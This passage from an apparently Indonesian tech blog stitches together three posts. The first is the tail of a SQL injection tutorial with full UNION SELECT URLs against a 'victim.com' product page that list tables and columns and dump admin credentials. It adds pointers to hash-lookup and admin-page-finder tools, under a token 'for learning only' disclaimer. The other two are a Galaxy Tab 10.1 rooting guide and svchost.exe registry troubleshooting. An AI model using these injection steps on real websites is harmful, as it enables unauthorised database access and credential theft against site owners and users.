    dan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18
    Code:
    http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

    akan muncul nama-nama table :
    Code:
    login,tbanner,tcatprod,tproduct,tset

    Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
    kali ini kita ambil table "login"
    sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
    http://cyber4rt.com/~converter
    ketik : login
    pilih ASCII to Hex
    hasilnya : 6c6f67696e

    Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

    ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
    tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
    ke hexa
    Code:
    http://www.victim.com/detailproduct.php?id=-75 union all select
    1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
    rmation_schema.columns+where+table_name=0x6c6f67696e--

    muncul column : user,pass

    untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

    ganti column 1 dengan "user" dan column2 dengan "pass"
    0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
    NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"
    Code:
    http://www.victim.com/detailproduct.php?id=-75 union all select
    1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--


    hasil : admin:admin
    jadi,
    user = admin
    password = admin
    nb : Jika ada yang mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini http://hashchecker.de/find.html

    Selesai ??? belum.... :p
    Langkah selanjutnya adalah mencari Admin Page target kita. Anda bisa menggunakan "adminfinder" atau "scanlink.py"
    download di mari : http://www.ziddu.com/download/10386415/InstantSQLI.rar.html

    Klo ada yg dapat admin pagenya... tolong jangan di deface, ini hanya untuk pembelajaran saja.

    Cara Rooting Android 3.1 ( Galaxy Tab 10.1 16GB Wifi 3G )

    Pada kesempatan kali ini kita akan membahas secara langkah demi langkah tentang Cara Rooting Android 3.1 ( Galaxy Tab 10.1 16GB Wifi 3G ) lengkap dengan gambar dan videonya. Android 3.1 ternyata lebih mudah untuk dioprek karena tutorialnya banyak sekali, bahkan bisa untuk menjalankan OS Backtrack 5 & Ubuntu secara lancar jaya.

    Kenapa harus di-root ?

    Jawabannya karena banyak aplikasi di android market terutama yg memaksimalkan kinerja wifi hanya dapat berjalan jika udah di-root, bisa di overclock sampe 2 GHz (tapi abis itu ga bisa dipake kali ya? :hammer) selain itu kita bisa juga install ubuntu atau BT5 di Android. Untuk lebih lengkapnya, silakan baca Apa Itu Rooting Android ?

    Apa saja yg diperlukan ?

    1. GT-p7510_USB_Driver_v1_3_2360_0-Escape.exe : USB Driver Galaxy Tab buat di OS Windows
    2. Odin3_v1.85.exe : tools utk melakukan flashing di Android devices
    3. Recovery-cwm_4.0.0.4-sam-tab-10.1.tar.md5 : file flashnya
    4. Samsung_Galaxy_Tab_10.1_root.zip : file utk nge-root

    SEMUA FILE _ FILE DI ATAS BISA ANDA DOWNLOAD DI SINI

    Setelah itu ekstrak ke folder yang diinginkan

    Proses root Android lebih mudah dilakukan di OS Windows karena memang toolsnya banyak, kalau teman2 bisa melakukannya di Linux juga tidak masalah kok, tapi ane pilih Windows biar lebih mudah.

    LANGKAH - LANGKAHNYA :

    1. Matikan Galaxy Tab dengan menekan tombol power kemudian pilih POWER OFF
    2. Masuk ke dalam Mode Downloader, tekan tombol volume down + power secara bersamaan kemudian lepas ketika ada gambar dua (2) buah icon berbentuk Android besar dan Android kecil (+ kotak).

      note: tombol volume down adalah yang paling dekat dengan tombol power



      Pilih Android besar untuk masuk ke Mode Downloader dengan menekan tombol volume up

    3. Sebelum memasang kabel USB ke PC/Laptop install dulu drivernya dari file yang telah di download diatas, double klik GT-p7510_USB_Driver_v1_3_2360_0-Escape.exe kemudian next, next..... setelah selesai install driver barulah kita pasang kabel USB-nya ke PC/Laptop dan biarkan Windows mendeteksinya.
    4. Jalankan Odin3_v1.85.exe, perhatikan pada kotak kiri atas seharusnya Galaxy Tab telah terdeteksi dengan adanya tulisan COM: X warna kuning (X bisa angka berapa saja).



      Pilih yang PDA kemudian cari file recovery-cwm_4.0.0.4-sam-tab-10.1.tar.md5 setelah itu klik start...



      kemudian Galaxy Tab akan mulai melakukan proses flashingnya...



      Setelah selesai Galaxy Tab akan reboot dengan sendirinya.
    5. Copy file Samsung_Galaxy_Tab_10.1_root.zip ke Galaxy Tab, gunakan saja Windows Explorer tinggal drag n drop. Taruh di folder paling luar dari Galaxy Tab biar mudah dicari nantinya.

    6. Matikan Galaxy Tab dan lakukan hal seperti pada langkah no 2 tetapi kali ini pilih Android kecil (+kotak)

    7. Tekan tombol volume up/down untuk memilih "apply update from /sdcard, next tekan tombol power.

    8. Cari file Samsung_Galaxy_Tab_10.1_root.zip kemudian tekan tombol power.



      Galaxy Tab akan melakukan proses root sampai selesai....



      Jika semuanya lancar seharusnya muncul "Install from sdcard complete"
    9. Pilih "Go back" kemudian pilih Reboot

    Di bawah ini adalah tutorial videonya :

    [IKONspirasi feat. Galaxytabhacks.com]

    Mengatasi Error Svchost.exe

    Sebenarnya svchost.exe itu apa ?
    Svchost.exe merupakan file system dan penting dari sebuah system windows yang berfungsi sebagai "Generic Host Process for Win32 Services" atau yang mengurusi beberapa servis (services) penting pada windows, bahkan klo ditelusuri banyak sekali servis windows yang dilakukan oleh file penting ini, misalkan :
    • Security Center; memonitor sekuritas system dan konfigurasinya
    • Windows Firewall; mencegah masuknya aplikasi-aplikasi yang tidak diinginkan ke dalam sistem windows
    • Workstation; membuat dan mengatur koneksi network clients ke remote server
    • DHCP Client; mengatur konfigurasi network dengan melakukan registrasi dan updating IP dan nama DNS dan berbagai macam servis penting lainnya, terutama servis untuk masalah inter koneksi (network)
    Mengatasi Error Svchost.exe
    Untuk mengetahu aktifitas svchost.exe , kita bisa mengetikan "services.msc"  ( tanpa tanda kutip) dalam kotak dialog RUN. Dari console tersebut kita bisa melihat program apa saja yang berjalan menggunakan svchost.exe . Untuk warning saja, jangan memberhentikan (stop) program-program yang berjalan menggunakan svchost.exe karena akan berakibat berhentinya program-program tersebut.
    Akibat dari svchost.exe suhu laptop cepat naik, dan beberapa program aplikasi sering not responding, dan berjalan lemot. Browser sering crash, dan berjalan lambat. Kadang laptop tidak bisa shut down dan harus menggunakan tombol turn off, sering muncul pesan error yang menginformasikan svchost.exe bermasalah.

    Ciri-ciri svchost.exe
    svchost yang asli memiliki ciri-ciri seperti berikut:
    1. Bisa ditemukan di alamat: C:WINDOWSsystem32svchost.exe
    2. Mempunyai ukuran sekitra 14 KB.
    3. Bertipekan aplication
    4. Informasi Properties:
      • Description: Generic Host Process for Win32 Services
      • Company: Microsoft Corporation
      • Internal nam: svchost.exe
      • Original Filename: svchost.exe
      • Product name: Microsoft Windows Operating System
    5. Icon berbentuk kotak putih ada bis biru di bagian atas.
    Cara manual mengatasi svchost.exe bermaslah:
    • Buka registry editor, start > run > ketik : regedit > ok
    • masuk ke HKEY_LOCAL_MACHINESystemCurrentControlSetServicesNetBTParameters, kemudian pada kolom sebelah kanan cari TransportBindName dan klik 2x
    • Setelah itu kosongin parameter pada Value data dan klik OK
    • Terakhir masuk ke HKEY_LOCAL_MACHINESoftwareMicrosoftOLE, cari EnableDCOM pada kolom sebelah kanan dan klik 2x. Pada kolom parameter Value data secara default akan terisi Y, ganti Y menjadi N kemudian klik OK.
    • Tutup registri editor dan aplikasi lainnya kemudian restart
    Cara yang di atas jika dipergunakan untuk jaringan lokal akan menemui beberapa kendala, soalnya port 445 dan 135 ditutup.
    Jika suatu waktu ingin mengembalikan kembali ke posisi semula, kita tinggal melakukan hal yang sama seperti langkah - langkah diatas, dan rubah kembali posisi "parameter" pada value yang kosong  pada TransportBindName kita tulis kembali seperti semula yaitu Device
    Dan pada parameter data di EnableDCOM kita ganti kembali dengan parameter "Y"